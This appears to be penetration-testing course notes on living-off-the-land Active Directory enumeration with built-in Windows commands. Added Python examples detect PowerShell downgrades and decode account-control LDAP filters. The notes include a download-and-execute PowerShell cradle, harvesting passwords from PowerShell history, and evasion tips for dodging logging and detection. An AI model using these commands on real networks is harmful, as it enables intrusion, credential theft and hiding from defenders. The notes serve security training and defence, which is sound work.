Living Off the Land
Techniques for AD enumeration using only native Windows tools and commands — no imported tools required. Useful when you cannot load tools onto a managed host, have no internet access, or need to stay stealthy. Native commands generate fewer logs and alerts compared to pulling offensive tools into the environment.
Host & Network Reconnaissance
Basic Enumeration Commands
| Command | Result |
|---|---|
| hostname | PC name |
| [System.Environment]::OSVersion.Version | OS version and revision |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | Patches and hotfixes |
| ipconfig /all | Network adapter config |
| set | Environment variables (CMD) |
| echo %USERDOMAIN% | Domain name (CMD) |
| echo %logonserver% | Domain controller name (CMD) |
| systeminfo | All of the above in one command (fewer logs) |
Network Enumeration
| Command | Purpose |
|---|---|
| arp -a | Known hosts in ARP table — reveals local network hosts |
| ipconfig /all | Adapter settings and network segment |
| route print | Routing table — known networks and potential lateral movement paths |
| netsh advfirewall show allprofiles | Firewall status for all profiles (Domain/Private/Public) |
Networks in the routing table are potential lateral movement targets — they’re either actively used or administratively configured.
Check Who Else is Logged In
qwinsta
Always check before taking action — if another user notices unusual activity, they may report it or change their password.
PowerShell Techniques
Useful Cmdlets
| Cmdlet | Purpose |
|---|---|
| Get-Module | List loaded modules (check for AD module, custom scripts) |
| Get-ExecutionPolicy -List | Execution policy per scope |
| Set-ExecutionPolicy Bypass -Scope Process | Bypass execution policy for current process only (reverts on exit) |
| Get-ChildItem Env: \| ft Key,Value | Environment variables |
| Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt | PowerShell command history (may contain passwords) |
| powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL')" | Download and execute from memory |
PowerShell Downgrade for Evasion
PowerShell event logging (Script Block Logging) was introduced in PowerShell 3.0. Downgrading to version 2.0 disables logging for that session:
powershell.exe -version 2
Get-host # Verify version shows 2.0
Caveats:
- The command `powershell.exe -version 2` itself is logged
- After the downgrade, no further Script Block Logging entries are created
- A vigilant defender may notice the logging gap and investigate
- Requires .NET Framework 2.0 to be installed on the host
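The defender's side of the downgrade, as an added example that is not part of the original notes: the Windows PowerShell log records every engine start as Event ID 400 with Name=Value detail lines, so a 2.x EngineVersion in that event is the logging gap made visible. The sample records below are constructed for the example (field names follow the real event; the values, including HostApplication, are made up).

```python
import re

# Constructed records shaped like Windows PowerShell log Event ID 400 ("Engine
# state is changed from None to Available"). Field names match the real event;
# the values, including HostApplication, are made up for this example.
SAMPLE_EVENTS = [
    {"id": 400, "message": "Engine state is changed from None to Available.\n"
     "Details:\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n"
     "\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
     "\tEngineVersion=5.1.19041.1"},
    {"id": 400, "message": "Engine state is changed from None to Available.\n"
     "Details:\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n"
     "\tHostApplication=powershell.exe -version 2\n"
     "\tEngineVersion=2.0"},
    {"id": 403, "message": "Engine state is changed from Available to Stopped.\n"
     "Details:\n\tHostVersion=5.1.19041.1\n\tEngineVersion=5.1.19041.1"},
]
# Each detail line of the message body has the form "\tName=Value"
FIELD_RE = re.compile(r"^\s*(\w+)=(.*)$", re.MULTILINE)

def parse_fields(message):
    """Turn the Name=Value detail lines of an event message into a dict."""
    return {m.group(1): m.group(2).strip() for m in FIELD_RE.finditer(message)}

def major_version(version):
    """'5.1.19041.1' -> 5; an empty or malformed string -> None."""
    head = version.split(".")[0]
    return int(head) if head.isdigit() else None

def is_downgrade(event):
    """True for an engine-start event (ID 400) that reports a 2.x engine."""
    if event["id"] != 400:
        return False
    fields = parse_fields(event["message"])
    return major_version(fields.get("EngineVersion", "")) == 2

def find_downgrades(events):
    """(HostApplication, EngineVersion) for every suspicious engine start."""
    hits = []
    for ev in events:
        if is_downgrade(ev):
            f = parse_fields(ev["message"])
            hits.append((f.get("HostApplication", ""), f.get("EngineVersion", "")))
    return hits

if __name__ == "__main__":
    for host_app, engine in find_downgrades(SAMPLE_EVENTS):
        print(f"PowerShell {engine} engine started by: {host_app}")
```

On a live host the same records come from the "Windows PowerShell" log (Get-WinEvent with Id 400); the parser only needs the event message text.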
Checking Defenses
Firewall Status
netsh advfirewall show allprofiles
Check the State field — ON or OFF for each profile (Domain, Private, Public).
Windows Defender
sc query windefend
Get-MpComputerStatus
Key fields: RealTimeProtectionEnabled, AntivirusEnabled, BehaviorMonitorEnabled, IsTamperProtected, scan schedules, signature age.
WMI (Windows Management Instrumentation)
Scripting engine for retrieving system info from local and remote hosts.
Useful WMI Commands
| Command | Purpose |
|---|---|
| wmic qfe get Caption,Description,HotFixID,InstalledOn | Patch level |
| wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List | Host info |
| wmic process list /format:list | Running processes |
| wmic ntdomain list /format:list | Domain and DC info (includes trusts) |
| wmic useraccount list /format:list | Local and domain accounts that have logged in |
| wmic group list /format:list | Local groups |
| wmic sysaccount list /format:list | System/service accounts |
Domain and Trust Enumeration via WMI
wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress
Reveals the current domain, child domains, and external forest trusts with DC addresses.
Net Commands
Built-in commands for user, group, host, and share enumeration. Note: net.exe commands are commonly monitored by EDR — use with caution.
Evasion Tip
Use net1 instead of net — executes the same functions but may avoid string-based detection triggers:
net1 user /domain
net1 group /domain
Key Commands
| Command | Purpose |
|---|---|
| net accounts /domain | Password and lockout policy |
| net user /domain | All domain users |
| net user <username> /domain | Specific user details |
| net group /domain | All domain groups |
| net group "Domain Admins" /domain | DA members |
| net group "domain computers" /domain | Domain-joined computers |
| net group "Domain Controllers" /domain | DCs |
| net localgroup | All local groups |
| net localgroup administrators | Local admin members |
| net share | Current shares |
| net view | List of domain computers |
| net view /domain | Shares on the domain |
| net view \\computer /ALL | All shares on a computer |
Dsquery
Command-line tool for querying AD objects. Available on any host with AD Domain Services Role installed. The dsquery.dll exists on all modern Windows systems at C:\Windows\System32\dsquery.dll. Requires elevated privileges or SYSTEM context.
Basic Queries
dsquery user
dsquery computer
dsquery group
dsquery ou
Wildcard Search (List All Objects in an OU)
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
LDAP Filter Queries
Users with PASSWD_NOTREQD Flag
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
Find Domain Controllers
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
LDAP OID Matching Rules
| OID | Rule | Use Case |
|---|---|---|
| 1.2.840.113556.1.4.803 | Bitwise AND — all bits must match | Match a single specific attribute |
| 1.2.840.113556.1.4.804 | Bitwise OR — any bit match | Match any of several attributes |
| 1.2.840.113556.1.4.1941 | Chain match (LDAP_MATCHING_RULE_IN_CHAIN) | Search through DN ownership/membership |
LDAP Logical Operators
| Operator | Meaning | Example |
|---|---|---|
| & | AND | (&(objectClass=user)(adminCount=1)) |
| \| | OR | (\|(objectClass=user)(objectClass=computer)) |
| ! | NOT | (&(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=64))) |
Common UAC Bitmask Values
| Decimal | Hex | Attribute |
|---|---|---|
| 2 | 0x0002 | Account is disabled |
| 8 | 0x0008 | Home directory required |
| 16 | 0x0010 | Account locked out |
| 32 | 0x0020 | Password not required |
| 64 | 0x0040 | Password can’t change |
| 512 | 0x0200 | Normal account |
| 8192 | 0x2000 | Server trust account (Domain Controller) |
| 65536 | 0x10000 | Password doesn’t expire |
| 4194304 | 0x400000 | Don’t require pre-auth (AS-REP roastable) |
| 524288 | 0x80000 | Trusted for delegation |
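The bitwise matching rules and the UAC table above, worked through as an added example (not code from the original notes): the Python below decodes a userAccountControl value into the table's flag names and evaluates a single `(attribute:oid:=mask)` clause the way AD does for the 803 (AND) and 804 (OR) rules, reproducing the PASSWD_NOTREQD and domain-controller filters from the dsquery section. It handles only that bitwise clause, not the surrounding objectCategory/objectClass terms, and the accounts are constructed sample data.

```python
import re

# Subset of userAccountControl bits from the table above, by Microsoft flag name
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002, "HOMEDIR_REQUIRED": 0x0008, "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020, "PASSWD_CANT_CHANGE": 0x0040, "NORMAL_ACCOUNT": 0x0200,
    "SERVER_TRUST_ACCOUNT": 0x2000, "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000, "DONT_REQ_PREAUTH": 0x400000,
}
# Bitwise matching-rule OIDs from the LDAP OID table above
RULE_BIT_AND = "1.2.840.113556.1.4.803"
RULE_BIT_OR = "1.2.840.113556.1.4.804"
# One extensible-match clause, e.g. (userAccountControl:<oid>:=32)
CLAUSE_RE = re.compile(r"^\((\w+):([\d.]+):=(\d+)\)$")

def decode_uac(value):
    """Name every known flag set in a userAccountControl value."""
    return sorted(name for name, bit in UAC_FLAGS.items() if value & bit)

def bitwise_match(value, oid, mask):
    """Evaluate an LDAP bitwise matching rule the way AD does."""
    if oid == RULE_BIT_AND:
        return value & mask == mask   # every bit in mask must be set
    if oid == RULE_BIT_OR:
        return value & mask != 0      # at least one bit in mask is set
    raise ValueError(f"unsupported matching rule: {oid}")

def parse_clause(clause):
    """'(userAccountControl:1.2.840.113556.1.4.803:=32)' -> (attr, oid, 32)."""
    m = CLAUSE_RE.match(clause)
    if not m:
        raise ValueError(f"not a bitwise clause: {clause}")
    return m.group(1), m.group(2), int(m.group(3))

def search(accounts, clause):
    """sAMAccountNames of the accounts whose attribute satisfies the clause."""
    attr, oid, mask = parse_clause(clause)
    return [a["sAMAccountName"] for a in accounts
            if bitwise_match(a.get(attr, 0), oid, mask)]

# Constructed sample accounts; the UAC values are chosen to exercise the table
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x20 | 0x10000},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x200 | 0x400000},
]
```

Running `search(SAMPLE_ACCOUNTS, "(userAccountControl:1.2.840.113556.1.4.803:=32)")` returns the one account with PASSWD_NOTREQD set, and swapping the OID for the 804 rule with mask 4194336 (32 + 4194304) returns any account with either that flag or DONT_REQ_PREAUTH, which is the audit list a defender wants from this table.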
Summary
| Tool | Type | Best For |
|---|---|---|
| systeminfo | Built-in | Quick host overview in one command |
| PowerShell cmdlets | Built-in | Module discovery, environment enum, history pillaging |
| PS downgrade (v2) | Evasion | Bypass Script Block Logging |
| netsh / sc | Built-in | Firewall and Defender status |
| WMI (wmic) | Built-in | Domain/trust/process/user enumeration |
| net / net1 | Built-in | User, group, share, policy enumeration |
| dsquery | Built-in | LDAP-based AD queries with filter support |
| qwinsta | Built-in | Check for other logged-in users |
| arp -a / route print | Built-in | Network discovery and lateral movement paths |